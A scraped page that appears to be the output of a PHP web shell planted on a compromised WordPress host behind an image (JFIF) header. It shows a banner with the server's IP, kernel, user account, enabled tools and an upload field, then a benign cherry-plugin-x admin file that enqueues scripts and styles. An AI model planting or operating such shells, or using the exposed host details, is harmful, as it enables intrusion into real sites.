????JFIF??x?x????'
Server IP : 104.21.112.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/peekmysite.com/wp-content/plugins/cherry-plugin-x/admin/ |
Upload File : |
<?php //includ js files if(!function_exists('cherry_include_admin_scripts')){ function cherry_include_admin_scripts(){ wp_enqueue_script('cherry_plugin_script', CHERRY_PLUGIN_URL.'admin/js/cherry-admin-plugin.js', array('jquery'), '0.1', true); } add_action( 'admin_enqueue_scripts', 'cherry_include_admin_scripts' ); } //includ css files if(!function_exists('cherry_include_admin_style')){ function cherry_include_admin_style(){ wp_enqueue_style('cherry_plugin_stylesheet', CHERRY_PLUGIN_URL.'admin/css/cherry-admin-plugin.css', false, '0.1', 'all'); wp_enqueue_style('font-awesome', '//netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css', false, '3.2.1', 'all'); } add_action( 'admin_enqueue_scripts', 'cherry_include_admin_style' ); }